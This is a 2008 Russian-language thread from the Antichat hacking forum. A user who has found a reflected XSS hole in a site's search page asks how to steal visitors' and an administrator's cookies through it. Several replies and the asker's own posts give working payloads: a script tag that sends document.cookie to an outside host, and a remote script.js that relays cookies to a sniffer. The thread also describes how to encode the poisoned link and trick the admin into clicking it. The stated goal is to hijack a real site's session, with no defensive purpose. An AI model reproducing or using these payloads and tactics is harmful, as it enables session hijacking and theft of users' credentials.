ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Xss в поиске...что дальше ?
  #1  
Старый 10.06.2008, 13:40
Аватар для geforse
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
Smile Xss в поиске...что дальше ?

Здрасте
Извините если ни там запостил тему,,,,нужна помошь ачатовцев

Вобщем есть сайт, там поиск, там есть XSS (активная вроде))

вобщем если в поиске ввести

"><script>alert('antichat.ru')</script>

и нажать НАЙТИ,,,,то вылезает окошко с надписью античат...
(тестировал в опере и осле 7)

Теперь вопрос:

Как получить куки пользователей если ксс в поиске
Это вообще реально ?

Спасибо
 
Ответить с цитированием

  #2  
Старый 10.06.2008, 13:44
Аватар для Mo4x
Mo4x
Постоянный
Регистрация: 18.02.2007
Сообщений: 416
Провел на форуме:
3509350

Репутация: 412
По умолчанию

Это посевная хсс а не активная .
 
Ответить с цитированием

  #3  
Старый 10.06.2008, 13:46
Аватар для geforse
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
По умолчанию

Тоесть если я напишу админу письмо:

Привет
у тебя поиск не работает ( =


Он зайдет в поиск...и как мне его куки своровать ?

Я толко этого не пойму...
 
Ответить с цитированием

  #4  
Старый 10.06.2008, 13:48
Аватар для k0lbasa
k0lbasa
Постоянный
Регистрация: 25.05.2008
Сообщений: 367
Провел на форуме:
2352294

Репутация: 416
По умолчанию

http://forum.antichat.ru/thread20140.html
 
Ответить с цитированием

  #5  
Старый 10.06.2008, 13:50
Аватар для it's my
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию

Суй в линк снифер, шифруй, и суй линк зверю которого хочешь поиметь, смотри снифер, ставь куки, властвуй.
 
Ответить с цитированием

  #6  
Старый 10.06.2008, 13:52
Аватар для geforse
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
По умолчанию

k0lbasa
Да я эту тему наизусть тебе могу рассказать ( =

Тоесть если у меня будет сайт:

мой_сайт.ру/xss.htm

в xss.htm код
Код HTML:
'><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
Я кидаю ссылку админу в ЛС тип зайди на этот сайт....он заходит и его куки у меня

Разве такое сработает ?
 
Ответить с цитированием

  #7  
Старый 10.06.2008, 13:52
Аватар для ty13r
ty13r
Познающий
Регистрация: 18.07.2007
Сообщений: 40
Провел на форуме:
72605

Репутация: 13
Отправить сообщение для ty13r с помощью ICQ
По умолчанию

Ссылку ядовитую надо ему подсунуть где в урле чето типа того
"><script scr=http://xxx.ru/script.js></script>
где script.js шлет куки на снифер
 
Ответить с цитированием

  #8  
Старый 10.06.2008, 13:53
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

это пассивная
хэк
 
Ответить с цитированием

  #9  
Старый 10.06.2008, 13:56
Аватар для geforse
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
По умолчанию

Цитата:
Сообщение от ty13r  
Ссылку ядовитую надо ему подсунуть где в урле чето типа того
"><script scr=http://xxx.ru/script.js></script>
где script.js шлет куки на снифер
Как же такое сделать если ксс толко в поиске есть
 
Ответить с цитированием

  #10  
Старый 10.06.2008, 14:04
Аватар для geforse
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841

Репутация: 712


Отправить сообщение для geforse с помощью ICQ
По умолчанию

Тоесть Xss, которую я в поиске нашёл...она вообще не нужна ?

Если что-то в поиске искать, выводится так:

www.site.com/ssearch.php?q=antichat.ru
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Юмор. Анекдоты, смешные рассказы/логи. Mobile Болталка 1356 16.06.2010 16:46
Продвижение сайтов в зарубежных поисковых системах baltazar Статьи 1 24.03.2008 03:41
Установка Windoze глазами линуксоида (100% факты) nerezus Болталка 47 16.10.2005 15:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ